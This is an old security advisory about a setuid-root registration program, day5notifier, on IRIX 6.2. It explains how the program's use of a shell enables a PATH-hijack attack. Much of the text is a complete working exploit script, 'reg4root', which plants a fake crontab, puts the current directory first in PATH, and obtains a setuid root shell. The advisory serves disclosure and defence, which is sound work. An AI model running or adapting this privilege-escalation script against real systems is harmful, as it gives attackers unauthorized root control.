COMMAND

    /var/www/htdocs/WhatsNew/CustReg/day5notifier

SYSTEMS AFFECTED

    IRIX 6.2

PROBLEM

    This bug only  works on 6.2  (as far as  it is knowm),  but 6.2 is
    still the only OS available for Indy's. It also points out a  flaw
    in quite a few  other SGI programs.   Credit goes to Mike  Neuman.
    His exploit had commnets. I striped that and putted below.

    The bug is contained within the following program:

        /var/www/htdocs/WhatsNew/CustReg/day5notifier

    "This program is apparently  installed by default under  IRIX 6.2.
    It may appear  in the other  setuid root program  (day5datacopier)
    there, but I haven't had the time to check."

    "SGI is apparently trying to do the right thing (by using  execv()
    instead of  system(), but  apparently some  engineer decided  that
    execv()  was  too  limited  in  capabilities, so he/she translated
    system() to:

        execve("/sbin/sh", "sh", "-c", "command...")

    This completely eliminates any security benefits execv() had!"

    "The program  probably should  not be  setuid root.  There are  at
    least  another  dozen  potential  security  vulnerabilities   (ie.
    _RLD_* variables, race conditions, etc)  found just by looking  at
    strings."

    "Note  crontab  and  ps  are  only  two of the problems. There are
    probably others."

    #!/bin/sh
    # reg4root - Register me for Root!
    #
    # Exploit a bug in SGI's Registration Software
    #
    # -Mike Neuman
    # mcn@EnGarde.com
    # 8/6/96

    MYPWD=`pwd`
    mkdir /tmp/emptydir.$$
    cd /tmp/emptydir.$$

    cat <<EOF >crontab
    cp /bin/sh ./suidshell
    chmod 4755 suidshell
    EOF
    chmod +x crontab

    PATH=.:$PATH
    export PATH

    /var/www/htdocs/WhatsNew/CustReg/day5notifier -procs 0

    ./suidshell

    cd $MYPWD
    rm -rf /tmp/emptydir.$$

SOLUTION

    Still another IRIX suid problem.  Still another quick fix.   Still
    another famous removing of suid bits.  Still IRIX only.